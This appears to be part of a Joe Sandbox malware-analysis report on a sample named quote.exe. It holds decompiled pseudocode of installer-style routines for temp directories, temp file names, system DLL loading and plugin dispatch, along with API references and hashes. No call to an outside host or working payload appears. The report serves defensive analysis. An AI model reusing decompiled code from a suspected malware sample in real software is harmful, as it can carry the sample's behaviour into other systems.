                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402703
                                                                                      0x00402703
                                                                                      0x0040270a
                                                                                      0x0040270c
                                                                                      0x0040270c
                                                                                      0x00402712
                                                                                      0x00402876
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x0040287e
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00000000
                                                                                      0x00402718
                                                                                      0x00402719
                                                                                      0x00402724
                                                                                      0x00402727
                                                                                      0x00402733
                                                                                      0x00402737
                                                                                      0x004027cf
                                                                                      0x004027e7
                                                                                      0x004027f7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040273d
                                                                                      0x0040273d
                                                                                      0x00402740
                                                                                      0x00402741
                                                                                      0x00402744
                                                                                      0x00402749
                                                                                      0x00402750
                                                                                      0x00402758
                                                                                      0x00000000
                                                                                      0x0040275e
                                                                                      0x0040275e
                                                                                      0x00402763
                                                                                      0x00000000
                                                                                      0x00402769
                                                                                      0x00402769
                                                                                      0x00402771
                                                                                      0x00402774
                                                                                      0x00402777
                                                                                      0x00402832
                                                                                      0x00402839
                                                                                      0x0040277d
                                                                                      0x00402783
                                                                                      0x0040278f
                                                                                      0x004027f9
                                                                                      0x004027f9
                                                                                      0x00402791
                                                                                      0x00402791
                                                                                      0x00402794
                                                                                      0x00402796
                                                                                      0x00402796
                                                                                      0x00402796
                                                                                      0x00402799
                                                                                      0x0040279e
                                                                                      0x004027a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004027a3
                                                                                      0x004027a6
                                                                                      0x004027ae
                                                                                      0x004027ba
                                                                                      0x004027c8
                                                                                      0x00000000
                                                                                      0x004027ca
                                                                                      0x00000000
                                                                                      0x004027ca
                                                                                      0x00000000
                                                                                      0x004027c8
                                                                                      0x00402796
                                                                                      0x004027fc
                                                                                      0x004027ff
                                                                                      0x00000000
                                                                                      0x00402801
                                                                                      0x00402806
                                                                                      0x00402847
                                                                                      0x00402869
                                                                                      0x00402870
                                                                                      0x00402855
                                                                                      0x00402855
                                                                                      0x00402858
                                                                                      0x0040285b
                                                                                      0x0040285e
                                                                                      0x0040285e
                                                                                      0x00000000
                                                                                      0x0040280f
                                                                                      0x0040280f
                                                                                      0x00402812
                                                                                      0x00402815
                                                                                      0x0040281b
                                                                                      0x0040281f
                                                                                      0x00402822
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402822
                                                                                      0x00402806
                                                                                      0x004027ff
                                                                                      0x00402777
                                                                                      0x00402763
                                                                                      0x00402758
                                                                                      0x00000000
                                                                                      0x00402824
                                                                                      0x00402824
                                                                                      0x00402827
                                                                                      0x00402830
                                                                                      0x00000000
                                                                                      0x00402727
                                                                                      0x00402712
                                                                                      0x00402bcb
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 00402750
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                        • Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                      • Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
                                                                                      • Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                      • Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 751 405948-405993 CreateDirectoryW 752 405995-405997 751->752 753 405999-4059a6 GetLastError 751->753 754 4059c0-4059c2 752->754 753->754 755 4059a8-4059bc SetFileSecurityW 753->755 755->752 756 4059be GetLastError 755->756 756->754
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405948(WCHAR* _a4) {
                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                      				int _t22;
                                                                                      				long _t23;
                                                                                      
                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                      				_v36.Owner = 0x4083f8;
                                                                                      				_v36.Group = 0x4083f8;
                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                      				_v36.Revision = 1;
                                                                                      				_v36.Control = 4;
                                                                                      				_v36.Dacl = 0x4083e8;
                                                                                      				_v16.nLength = 0xc;
                                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                      				if(_t22 != 0) {
                                                                                      					L1:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t23 = GetLastError();
                                                                                      				if(_t23 == 0xb7) {
                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return _t23;
                                                                                      			}







                                                                                      0x00405953
                                                                                      0x00405957
                                                                                      0x0040595a
                                                                                      0x00405960
                                                                                      0x00405964
                                                                                      0x00405968
                                                                                      0x00405970
                                                                                      0x00405977
                                                                                      0x0040597d
                                                                                      0x00405984
                                                                                      0x0040598b
                                                                                      0x00405993
                                                                                      0x00405995
                                                                                      0x00000000
                                                                                      0x00405995
                                                                                      0x0040599f
                                                                                      0x004059a6
                                                                                      0x004059bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004059be
                                                                                      0x004059c2

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                      • GetLastError.KERNEL32 ref: 0040599F
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
                                                                                      • GetLastError.KERNEL32 ref: 004059BE
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040596E
                                                                                      • C:\Users\user\Desktop, xrefs: 00405948
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                      • API String ID: 3449924974-26219170
                                                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
                                                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 757 406796-4067b6 GetSystemDirectoryW 758 4067b8 757->758 759 4067ba-4067bc 757->759 758->759 760 4067cd-4067cf 759->760 761 4067be-4067c7 759->761 762 4067d0-406803 wsprintfW LoadLibraryExW 760->762 761->760 763 4067c9-4067cb 761->763 763->762
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406796(intOrPtr _a4) {
                                                                                      				short _v576;
                                                                                      				signed int _t13;
                                                                                      				struct HINSTANCE__* _t17;
                                                                                      				signed int _t19;
                                                                                      				void* _t24;
                                                                                      
                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                      				if(_t13 > 0x104) {
                                                                                      					_t13 = 0;
                                                                                      				}
                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                      					_t19 = 1;
                                                                                      				} else {
                                                                                      					_t19 = 0;
                                                                                      				}
                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                      				return _t17;
                                                                                      			}








                                                                                      0x004067ad
                                                                                      0x004067b6
                                                                                      0x004067b8
                                                                                      0x004067b8
                                                                                      0x004067bc
                                                                                      0x004067cf
                                                                                      0x004067c9
                                                                                      0x004067c9
                                                                                      0x004067c9
                                                                                      0x004067e8
                                                                                      0x004067fc
                                                                                      0x00406803

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                      • wsprintfW.USER32 ref: 004067E8
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
                                                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 764 405f36-405f42 765 405f43-405f77 GetTickCount GetTempFileNameW 764->765 766 405f86-405f88 765->766 767 405f79-405f7b 765->767 769 405f80-405f83 766->769 767->765 768 405f7d 767->768 768->769
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405F36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                      				intOrPtr _v8;
                                                                                      				short _v12;
                                                                                      				short _t12;
                                                                                      				intOrPtr _t13;
                                                                                      				signed int _t14;
                                                                                      				WCHAR* _t17;
                                                                                      				signed int _t19;
                                                                                      				signed short _t23;
                                                                                      				WCHAR* _t26;
                                                                                      
                                                                                      				_t26 = _a4;
                                                                                      				_t23 = 0x64;
                                                                                      				while(1) {
                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                      					_t23 = _t23 - 1;
                                                                                      					_v12 = _t12;
                                                                                      					_t13 =  *0x40a57c; // 0x61
                                                                                      					_v8 = _t13;
                                                                                      					_t14 = GetTickCount();
                                                                                      					_t19 = 0x1a;
                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                      					if(_t17 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					if(_t23 != 0) {
                                                                                      						continue;
                                                                                      					} else {
                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                      					}
                                                                                      					L4:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = _t26;
                                                                                      				goto L4;
                                                                                      			}












                                                                                      0x00405f3c
                                                                                      0x00405f42
                                                                                      0x00405f43
                                                                                      0x00405f43
                                                                                      0x00405f48
                                                                                      0x00405f49
                                                                                      0x00405f4c
                                                                                      0x00405f51
                                                                                      0x00405f54
                                                                                      0x00405f5e
                                                                                      0x00405f6b
                                                                                      0x00405f6f
                                                                                      0x00405f77
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f7b
                                                                                      0x00000000
                                                                                      0x00405f7d
                                                                                      0x00405f7d
                                                                                      0x00405f7d
                                                                                      0x00405f80
                                                                                      0x00405f83
                                                                                      0x00405f83
                                                                                      0x00405f86
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405F54
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\quote.exe" ,004034C3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F), ref: 00405F6F
                                                                                      Strings
                                                                                      • "C:\Users\user\Desktop\quote.exe" , xrefs: 00405F36
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3B
                                                                                      • nsa, xrefs: 00405F43
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2710244010
                                                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
                                                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 770 6f491777-6f4917b6 call 6f491b5f 774 6f4917bc-6f4917c0 770->774 775 6f4918d6-6f4918d8 770->775 776 6f4917c9-6f4917d6 call 6f4923e0 774->776 777 6f4917c2-6f4917c8 call 6f49239e 774->777 782 6f4917d8-6f4917dd 776->782 783 6f491806-6f49180d 776->783 777->776 786 6f4917f8-6f4917fb 782->786 787 6f4917df-6f4917e0 782->787 784 6f49182d-6f491831 783->784 785 6f49180f-6f49182b call 6f4925b5 call 6f4915b4 call 6f491272 GlobalFree 783->785 791 6f49187e-6f491884 call 6f4925b5 784->791 792 6f491833-6f49187c call 6f4915c6 call 6f4925b5 784->792 808 6f491885-6f491889 785->808 786->783 793 6f4917fd-6f4917fe call 6f492d83 786->793 789 6f4917e8-6f4917e9 call 6f492af8 787->789 790 6f4917e2-6f4917e3 787->790 804 6f4917ee 789->804 797 6f4917f0-6f4917f6 call 6f492770 790->797 798 6f4917e5-6f4917e6 790->798 791->808 792->808 801 6f491803 793->801 807 6f491805 797->807 798->783 798->789 801->807 804->801 807->783 813 6f49188b-6f491899 call 6f492578 808->813 814 6f4918c6-6f4918cd 808->814 820 6f49189b-6f49189e 813->820 821 6f4918b1-6f4918b8 813->821 814->775 816 6f4918cf-6f4918d0 GlobalFree 814->816 816->775 820->821 822 6f4918a0-6f4918a8 820->822 821->814 823 6f4918ba-6f4918c5 call 6f49153d 821->823 822->821 824 6f4918aa-6f4918ab FreeLibrary 822->824 823->814 824->821
                                                                                      C-Code - Quality: 88%
                                                                                      			E6F491777(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				void _v36;
                                                                                      				char _v136;
                                                                                      				struct HINSTANCE__* _t37;
                                                                                      				intOrPtr _t42;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t50;
                                                                                      				void* _t54;
                                                                                      				intOrPtr _t57;
                                                                                      				signed int _t61;
                                                                                      				signed int _t63;
                                                                                      				void* _t67;
                                                                                      				void* _t68;
                                                                                      				void* _t72;
                                                                                      				void* _t76;
                                                                                      
                                                                                      				_t76 = __esi;
                                                                                      				_t68 = __edi;
                                                                                      				_t67 = __edx;
                                                                                      				 *0x6f49506c = _a8;
                                                                                      				 *0x6f495070 = _a16;
                                                                                      				 *0x6f495074 = _a12;
                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x6f495048, E6F4915B1);
                                                                                      				_push(1);
                                                                                      				_t37 = E6F491B5F();
                                                                                      				_t54 = _t37;
                                                                                      				if(_t54 == 0) {
                                                                                      					L28:
                                                                                      					return _t37;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      						E6F49239E(_t54);
                                                                                      					}
                                                                                      					_push(_t54);
                                                                                      					E6F4923E0(_t67);
                                                                                      					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                      					if(_t57 == 0xffffffff) {
                                                                                      						L14:
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                      							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                      								_push(_t54);
                                                                                      								_t37 = E6F4925B5();
                                                                                      							} else {
                                                                                      								_push(_t76);
                                                                                      								_push(_t68);
                                                                                      								_t61 = 8;
                                                                                      								_t13 = _t54 + 0x1018; // 0x1018
                                                                                      								memcpy( &_v36, _t13, _t61 << 2);
                                                                                      								_t42 = E6F4915C6(_t54,  &_v136);
                                                                                      								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                      								_t18 = _t54 + 0x1018; // 0x1018
                                                                                      								_t72 = _t18;
                                                                                      								_push(_t54);
                                                                                      								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                      								 *_t72 = 4;
                                                                                      								E6F4925B5();
                                                                                      								_t63 = 8;
                                                                                      								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_push(_t54);
                                                                                      							E6F4925B5();
                                                                                      							_t37 = GlobalFree(E6F491272(E6F4915B4(_t54)));
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      							_t37 = E6F492578(_t54);
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                      								_t37 =  *(_t54 + 0x1008);
                                                                                      								if(_t37 != 0) {
                                                                                      									_t37 = FreeLibrary(_t37);
                                                                                      								}
                                                                                      							}
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                      								_t37 = E6F49153D( *0x6f495068);
                                                                                      							}
                                                                                      						}
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							return GlobalFree(_t54);
                                                                                      						}
                                                                                      					}
                                                                                      					_t48 =  *_t54;
                                                                                      					if(_t48 == 0) {
                                                                                      						if(_t57 != 1) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						E6F492D83(_t54);
                                                                                      						L12:
                                                                                      						_t54 = _t48;
                                                                                      						L13:
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t49 = _t48 - 1;
                                                                                      					if(_t49 == 0) {
                                                                                      						L8:
                                                                                      						_t48 = E6F492AF8(_t54); // executed
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t50 = _t49 - 1;
                                                                                      					if(_t50 == 0) {
                                                                                      						E6F492770(_t54);
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					if(_t50 != 1) {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}


















                                                                                      0x6f491777
                                                                                      0x6f491777
                                                                                      0x6f491777
                                                                                      0x6f491784
                                                                                      0x6f49178c
                                                                                      0x6f491799
                                                                                      0x6f4917a7
                                                                                      0x6f4917aa
                                                                                      0x6f4917ac
                                                                                      0x6f4917b1
                                                                                      0x6f4917b6
                                                                                      0x6f4918d8
                                                                                      0x6f4918d8
                                                                                      0x6f4917bc
                                                                                      0x6f4917c0
                                                                                      0x6f4917c3
                                                                                      0x6f4917c8
                                                                                      0x6f4917c9
                                                                                      0x6f4917ca
                                                                                      0x6f4917d0
                                                                                      0x6f4917d6
                                                                                      0x6f491806
                                                                                      0x6f49180d
                                                                                      0x6f491831
                                                                                      0x6f49187e
                                                                                      0x6f49187f
                                                                                      0x6f491833
                                                                                      0x6f491833
                                                                                      0x6f491834
                                                                                      0x6f49183d
                                                                                      0x6f49183e
                                                                                      0x6f491848
                                                                                      0x6f49184b
                                                                                      0x6f491850
                                                                                      0x6f491857
                                                                                      0x6f491857
                                                                                      0x6f49185d
                                                                                      0x6f49185e
                                                                                      0x6f491864
                                                                                      0x6f49186a
                                                                                      0x6f491877
                                                                                      0x6f491878
                                                                                      0x6f49187b
                                                                                      0x6f49180f
                                                                                      0x6f49180f
                                                                                      0x6f491810
                                                                                      0x6f491825
                                                                                      0x6f491825
                                                                                      0x6f491889
                                                                                      0x6f49188c
                                                                                      0x6f491899
                                                                                      0x6f4918a0
                                                                                      0x6f4918a8
                                                                                      0x6f4918ab
                                                                                      0x6f4918ab
                                                                                      0x6f4918a8
                                                                                      0x6f4918b8
                                                                                      0x6f4918c0
                                                                                      0x6f4918c5
                                                                                      0x6f4918b8
                                                                                      0x6f4918cd
                                                                                      0x00000000
                                                                                      0x6f4918cf
                                                                                      0x00000000
                                                                                      0x6f4918d0
                                                                                      0x6f4918cd
                                                                                      0x6f4917da
                                                                                      0x6f4917dd
                                                                                      0x6f4917fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4917fe
                                                                                      0x6f491803
                                                                                      0x6f491803
                                                                                      0x6f491805
                                                                                      0x00000000
                                                                                      0x6f491805
                                                                                      0x6f4917df
                                                                                      0x6f4917e0
                                                                                      0x6f4917e8
                                                                                      0x6f4917e9
                                                                                      0x00000000
                                                                                      0x6f4917e9
                                                                                      0x6f4917e2
                                                                                      0x6f4917e3
                                                                                      0x6f4917f1
                                                                                      0x00000000
                                                                                      0x6f4917f1
                                                                                      0x6f4917e6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4917e6

                                                                                      APIs
                                                                                        • Part of subcall function 6F491B5F: GlobalFree.KERNEL32(?), ref: 6F491DD4
                                                                                        • Part of subcall function 6F491B5F: GlobalFree.KERNEL32(?), ref: 6F491DD9
                                                                                        • Part of subcall function 6F491B5F: GlobalFree.KERNEL32(?), ref: 6F491DDE
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F491825
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6F4918AB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F4918D0
                                                                                        • Part of subcall function 6F49239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F4923CF
                                                                                        • Part of subcall function 6F492770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F4917F6,00000000), ref: 6F492840
                                                                                        • Part of subcall function 6F4915C6: wsprintfW.USER32 ref: 6F4915F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 95e40f0f3b4a4726366843c28eef24de0e3fa2b8c381715c5282771150bf5672
                                                                                      • Instruction ID: 4303981d15372720d493eb7f7b073c4acdf1f2a6dbd04f4b30f5006e27d37a4a
                                                                                      • Opcode Fuzzy Hash: 95e40f0f3b4a4726366843c28eef24de0e3fa2b8c381715c5282771150bf5672
